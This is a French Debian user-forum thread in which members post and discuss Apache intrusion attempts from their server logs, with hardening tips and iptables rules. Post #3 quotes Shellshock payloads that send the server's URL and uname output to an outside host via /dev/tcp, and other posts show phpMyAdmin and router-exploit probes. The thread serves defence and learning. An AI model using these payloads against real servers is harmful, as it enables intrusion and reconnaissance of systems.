Debian-facile

Bienvenue sur Debian-Facile, site d'aide pour les nouveaux utilisateurs de Debian.

Vous n'êtes pas identifié(e).

#1 14-03-2015 20:42:39

robert2a
Membre
Lieu : France
Distrib. : Stretch
Noyau : Linux 4.8.0-1-amd64
(G)UI : Mate 1.16.1
Inscription : 15-11-2014

securité serveur web apache

Bonsoir

je sais pas si cela est une bonne idée , mais j ai pensé repertorié les differentes attaques sur un serveur web , les etudier , les commenter , peut etre comment s en proteger.
personnellement je n ai pas le niveau sad  , par contre j ai des logs de tentatives d'intrusions et autres.
pour la maniere , je pense qu il est correct de masquer l ip de l attaquant et de l attaqué roll
l idée me vient a cause de raleur tongue et de ses remarques sur la sécurité qui sont pertinentes c est certain tongue
avant de poster quoi que ce soit , j attend votre avis smile

@++

Hors ligne

#2 14-03-2015 21:05:16

paskal
autobahn
Lieu : ailleurs
Inscription : 14-06-2011
Site Web

Re : securité serveur web apache

Bonsoir,

C'est une idée qui me trotte aussi dans la tête depuis pas mal de temps, surtout sur l'aspect défense.

Personnellement, j'y suis plutôt favorable.  smile

I'd love to change the world
But I don't know what to do
So I'll leave it up to you...

logo-sur-fond.png

Hors ligne

#3 14-03-2015 21:22:26

robert2a
Membre
Lieu : France
Distrib. : Stretch
Noyau : Linux 4.8.0-1-amd64
(G)UI : Mate 1.16.1
Inscription : 15-11-2014

Re : securité serveur web apache

alors je commence avec ce soir une tentative d installation d un Ecommerce sur le serveur (ce qu il me semble avec mes faibles connaissances ).
merchant.mvc est une application de ecommerce d apres google
voici le log d apache .
j ai fait des sauts de lignes volontairement sinon c est une seule ligne (pour la lisibilité )



109.xxx.xxx.xxx - - [14/Mar/2015:18:17:55 +0100] "GET /Merchant2/merchant.mvc HTTP/1.1" 404 1667 "() { :;};
 /bin/bash -c \"echo 82.xxx.xxx.xxx/Merchant2/merchant.mvc  > /dev/tcp/62.xxx.xxx.xxx/23;
 /bin/uname -a > /dev/tcp/62.xxx.xxx.xxx/23;
 echo 82.xxx.xxx.xxx/Merchant2/merchant.mvc > /dev/udp/62.xxx.xxx.xxx/80\"" "() { :;};
 /bin/bash -c \"echo 82.xxx.xxx.xxx/Merchant2/merchant.mvc  > /dev/tcp/62.xxx.xxx.xxx/23;
 /bin/uname -a > /dev/tcp/62.xxx.xxx.xxx/23;
 echo 82.xxx.xxx.xxx/Merchant2/merchant.mvc > /dev/udp/62.xxx.xxx.xxx/80\""


109.xxx.xxx.xxx - - [14/Mar/2015:18:23:33 +0100] "GET /mm5/merchant.mvc HTTP/1.1" 404 1643 "() { :;};
 /bin/bash -c \"echo 82.xxx.xxx.xxx/mm5/merchant.mvc  > /dev/tcp/62.xxx.xxx.xxx/23;
 /bin/uname -a > /dev/tcp/62.xxx.xxx.xxx/23;
 echo 82.xxx.xxx.xxx/mm5/merchant.mvc > /dev/udp/62.xxx.xxx.xxx/80\"" "() { :;};
 /bin/bash -c \"echo 82.xxx.xxx.xxx/mm5/merchant.mvc  > /dev/tcp/62.xxx.xxx.xxx/23;
 /bin/uname -a > /dev/tcp/62.xxx.xxx.xxx/23;
 echo 82.xxx.xxx.xxx/mm5/merchant.mvc > /dev/udp/62.xxx.xxx.xxx/80\""
 



ou alors la tentative de detecter une ecommerce sur le serveur et de recuperer des infos .

Dernière modification par robert2a (14-03-2015 21:31:13)

Hors ligne

#4 14-03-2015 21:43:51

robert2a
Membre
Lieu : France
Distrib. : Stretch
Noyau : Linux 4.8.0-1-amd64
(G)UI : Mate 1.16.1
Inscription : 15-11-2014

Re : securité serveur web apache

paskal a écrit :

Bonsoir,

C'est une idée qui me trotte aussi dans la tête depuis pas mal de temps, surtout sur l'aspect défense.

Personnellement, j'y suis plutôt favorable.  smile



le soucis avec les defenses , c est que souvant chacun garde sa methode cachée wink , mais bon la configuration de base d apache c est deja un bon debut.
personnellement je suis parti sur une base d une personne qui a en fait son metier donc avec de grosses connaissances et quelques un de ses conseils.
un bon debut est de desactiver les modules inutiles , maitriser les droits des dossiers comme empecher l execution de codes la ou il ne faut pas.
Malheureusement j'ai vite decroché depuis pas mal de temps et l ensemble apache , php , mysql et phpmyadmin sont plus aussi bien assimilé par mon cerveau tongue.
je pourrai vous donner les attaques mais certainement pas la solution ( a mon grand regret ) , en quelque sorte je subis avec l espoir que tout ce passe bien hmm

ps:sur les cahiers de l admin , il y a un bon paragraphe  sur la securité et comment analyser une tentative d intrusion (réussit ou pas ).

Dernière modification par robert2a (15-03-2015 01:13:46)

Hors ligne

#5 15-03-2015 01:07:01

robert2a
Membre
Lieu : France
Distrib. : Stretch
Noyau : Linux 4.8.0-1-amd64
(G)UI : Mate 1.16.1
Inscription : 15-11-2014

Re : securité serveur web apache

les classiques roll


207.xxx.xxx.xxx - - [14/Mar/2015:09:50:47 +0100] "GET / HTTP/1.1" 200 5186 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
celui ci en dessous deja vu :)
61.xxx.xxx.xxx - - [14/Mar/2015:10:41:24 +0100] "GET / HTTP/1.0" 200 5186 "-" "masscan/1.0 ([url]https://github.com/robertdavidgraham/masscan[/url])"
un robot , lire le robot.txt peut donner des infos ..........  ;)
17.xxx.xxx.xxx - - [14/Mar/2015:13:29:23 +0100] "GET /robots.txt HTTP/1.1" 200 25 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot)"
 



tenter d'avoir un acces par phpmyadmin


198.xxx.xxx.xxx - - [14/Mar/2015:20:56:51 +0100] "GET /phph/php/ph.php HTTP/1.1" 404 1118 "-" "-"
198.xxx.xxx.xxx - - [14/Mar/2015:20:56:51 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1118 "-" "-"
198.xxx.xxx.xxx - - [14/Mar/2015:20:56:52 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 1118 "-" "-"
198.xxx.xxx.xxx - - [14/Mar/2015:20:56:52 +0100] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 1118 "-" "-"
 


pour ce soir se sera tout , bien que 99% sont des tentatives de hack , et 1% de clients honorables.
On verra demain si il y a des remarques sur ces quelques exemples.
@++

Dernière modification par robert2a (15-03-2015 01:14:13)

Hors ligne

#6 15-03-2015 05:18:39

robert2a
Membre
Lieu : France
Distrib. : Stretch
Noyau : Linux 4.8.0-1-amd64
(G)UI : Mate 1.16.1
Inscription : 15-11-2014

Re : securité serveur web apache

un petit pour la nuit roll vu que ma chienne est pas d accord pour faire dodo .... hmm elle a peur de l orage malgres ses 45 kg tongue

1.xxx.xxx.xxx - - [15/Mar/2015:02:39:15 +0100] "CONNECT mx2.mail2000.com.tw:25 HTTP/1.0" 405 1008 "-" "-"
je sais pas ce qu il veut celui la smile
une adresse qui commence par 1 je connaissais pas.

ps: c est taiwan a priori ip qui commence par 1.xxx.xxx.xxx.
et a priori c est l utilisation de mon serveur comme intermediare pour envoyer des mails
apache 405 method not allowed  => tant mieux cool

Dernière modification par robert2a (15-03-2015 05:33:08)

Hors ligne

#7 15-03-2015 05:27:10

leonlemouton
Adhérent(e)
Distrib. : Jessie
Noyau : Linux 3.16.0-4-686-pae
(G)UI : Mate 1.8.1
Inscription : 14-08-2012

Hors ligne

#8 15-03-2015 05:40:28

robert2a
Membre
Lieu : France
Distrib. : Stretch
Noyau : Linux 4.8.0-1-amd64
(G)UI : Mate 1.16.1
Inscription : 15-11-2014

Re : securité serveur web apache

merci leonlemouton pour l info smile
mais je pense à mentionner quelques pieges a eviter pour un debutant qui a un serveur apache a la maison en ligne , accessible par internet.
et peut etre que quelqu un (j'ai bien une petite idée de qui wink ) pourrai faire un petit tuto sur la sécurité d apache.

un certain milou il me semble , le roi (ou la reine )  du tuto

Dernière modification par robert2a (15-03-2015 05:42:29)

Hors ligne

#9 15-03-2015 05:46:31

leonlemouton
Adhérent(e)
Distrib. : Jessie
Noyau : Linux 3.16.0-4-686-pae
(G)UI : Mate 1.8.1
Inscription : 14-08-2012

Re : securité serveur web apache

@captnfab (ou @milou de bon matin) devrait pouvoir nous faire ça !! En échanges de tablettes de chocolats et de gros gâteaux moelleux !! wink
un truc réservé aux membres actifs (attention l'expression membre actif n'a rien à voir avec l'anatomie humaine !!!) lol

Dernière modification par leonlemouton (15-03-2015 05:50:36)


Leonlemouton
°(")°

Hors ligne

#10 15-03-2015 05:50:53

robert2a
Membre
Lieu : France
Distrib. : Stretch
Noyau : Linux 4.8.0-1-amd64
(G)UI : Mate 1.16.1
Inscription : 15-11-2014

Re : securité serveur web apache

lol

pour ton deuxieme lien , manque les ip en 1.xxx

# Anti-Taiwanais
iptables -t filter -A INPUT -i eth0 -s 61.64.128.0/17 -j LOG_REJECT_SMTP
iptables -t filter -A INPUT -i eth0 -s 122.120.0.0/13 -j LOG_REJECT_SMTP
iptables -t filter -A INPUT -i eth0 -s 168.95.0.0/16 -j LOG_REJECT_SMTP
echo - Bloquer Taiwanais : [OK]

smile

Hors ligne

#11 15-03-2015 05:52:56

leonlemouton
Adhérent(e)
Distrib. : Jessie
Noyau : Linux 3.16.0-4-686-pae
(G)UI : Mate 1.8.1
Inscription : 14-08-2012

Re : securité serveur web apache

j'adore la ferme du web !! alors attention !! wink

Leonlemouton
°(")°

Hors ligne

#12 15-03-2015 17:09:25

robert2a
Membre
Lieu : France
Distrib. : Stretch
Noyau : Linux 4.8.0-1-amd64
(G)UI : Mate 1.16.1
Inscription : 15-11-2014

Re : securité serveur web apache

alors celui pas mal du tout  cool

181.xxx.xxx.xxx - - [15/Mar/2015:15:20:42 +0100] "GET /tmUnblock.cgi HTTP/1.1" 400 226 "-" "-"

400     Bad Request     La syntaxe de la requête est erronée

explication:

http://www.scip.ch/fr/?vuldb.12362

Résumé

Une vulnérabilité a été trouvé dans Cisco Linksys Router à E4200 et classée très critique. Affecté par ce problème est une fonction inconnue du fichier tmUnblock.cgi. La manipulation du paramètre ttcp_ip avec une valeur d’entrée inconnue mène à une vulnérabilité de classe elévation de privilèges.

on pense etre tranquil , on a un bon routeur ,  non c est raté ............ wink

ps: je rappel pour info c est du vécu en live tongue  (pour le FR c est plutot la nuit )

54.xxx.xxx.xxx - - [15/Mar/2015:07:59:44 +0100] "HEAD / HTTP/1.1" 200 - "-" "Cloud mapping experiment. Contact research@pdrlabs.net"

la par contre j ai pas compris avec un 200 , je vai chercher le " head "
ps: ce que j ai trouvé

méthode HEAD HTTP.

La méthode HEAD HTTP est défini à l'article 9.4 de RFC2616 :

    La méthode HEAD est identique à GET, sauf que le serveur NE DOIT PAS retourner un corps de message dans la réponse. La méta-informations contenues dans les en-têtes HTTP en réponse à une demande de tête doit être identique à l'information envoyée en réponse à une requête GET. Cette méthode peut être utilisée pour obtenir des méta-informations sur l'entité impliquée par la demande sans transfert de l'entité-corps lui-même. Cette méthode est souvent utilisée pour les liens hypertextes tests de validité, l'accessibilité et récente modification.

pour ceci "Cloud mapping experiment" je n'ai pas vraiment trouvé de réponses par contre je suis tombé sur des posts sur des serveurs vraiment compromis. ( cest a priori une adresse mail )

@++

Dernière modification par robert2a (15-03-2015 17:34:59)

Hors ligne

#13 19-03-2015 06:46:59

robert2a
Membre
Lieu : France
Distrib. : Stretch
Noyau : Linux 4.8.0-1-amd64
(G)UI : Mate 1.16.1
Inscription : 15-11-2014

Re : securité serveur web apache

ce log dans auth.log m inquiette un peu quelqu un a une idée ?


Mar 15 06:26:16 debian10 su[2640]: Successful su for nobody by root
Mar 15 06:26:16 debian10 su[2640]: + ??? root:nobody
Mar 15 06:26:16 debian10 su[2640]: pam_unix(su:session): session opened for user nobody by (uid=0)
Mar 15 06:26:16 debian10 systemd-logind[467]: New session 107 of user nobody.
Mar 15 06:26:16 debian10 systemd: pam_unix(systemd-user:session): session opened for user nobody by (uid=0)
Mar 15 06:26:20 debian10 su[2640]: pam_unix(su:session): session closed for user nobody
Mar 15 06:26:20 debian10 systemd-logind[467]: Removed session 107.
Mar 15 06:26:20 debian10 systemd: pam_unix(systemd-user:session): session closed for user nobody
 

Hors ligne

#14 19-03-2015 14:01:05

palmito
Administrateur
Lieu : Dans la boite de gâteau!
Distrib. : bah....
Noyau : heu...
(G)UI : gné?
Inscription : 28-05-2007

Re : securité serveur web apache

Salut

Très bonne idée ce topic wink

Pour l'user nobody -> http://www.debian.org/doc/manuals/secur … 11.fr.html

cf paragraphe 11.2.4

++

Hors ligne

#15 19-03-2015 19:47:27

robert2a
Membre
Lieu : France
Distrib. : Stretch
Noyau : Linux 4.8.0-1-amd64
(G)UI : Mate 1.16.1
Inscription : 15-11-2014

Re : securité serveur web apache

Merci pour l'info me reste plus qu'a vérifier roll

11.2.4 J'ai trouvé des utilisateurs utilisant « su » dans mes journaux : mon système est-il compromis ?

Vous pouvez trouver des lignes comme ceci dans vos journaux :

       Apr  1 09:25:01 server su[30315]: + ??? root-nobody
       Apr  1 09:25:01 server PAM_unix[30315]: (su) session opened for user nobody by (UID=0)

Ne vous inquiétez pas trop. Vérifiez que ces entrées sont dues à des tâches cron (habituellement, /etc/cron.daily/find ou logrotate) :


       $ grep 25 /etc/crontab
       25 6    * * *   root    test -e /usr/sbin/anacron || run-parts --report
       /etc/cron.daily
       $ grep nobody /etc/cron.daily/*
       find:cd / && updatedb --localuser=nobody 2>/dev/null
 



@++

Hors ligne

#16 01-04-2015 11:33:19

aurel-son
Membre
Lieu : Vietnam
Distrib. : Stable/Testing
Noyau : 3.2/3.18
(G)UI : Mate
Inscription : 23-03-2015
Site Web

Re : securité serveur web apache

Deja pour securise un serveur web, il faut bien verifier les permissions des dossiers.
Proteger egalement avec un htaccess mais il est mieux d'ecrire les fonctions htaccess dans le vhost (impossible sur un service mutualise).
Bloquer certaines choses comme la version d'apache, configurer des modules comme mod_security et bref j'en passe.

Deja rien que cela te protege deja pas mal smile

Desktop : Debian Jessie Mate/Kali
Serveur/NAS/firewall : Debian stable,Centos,BSD

Hors ligne

Pied de page des forums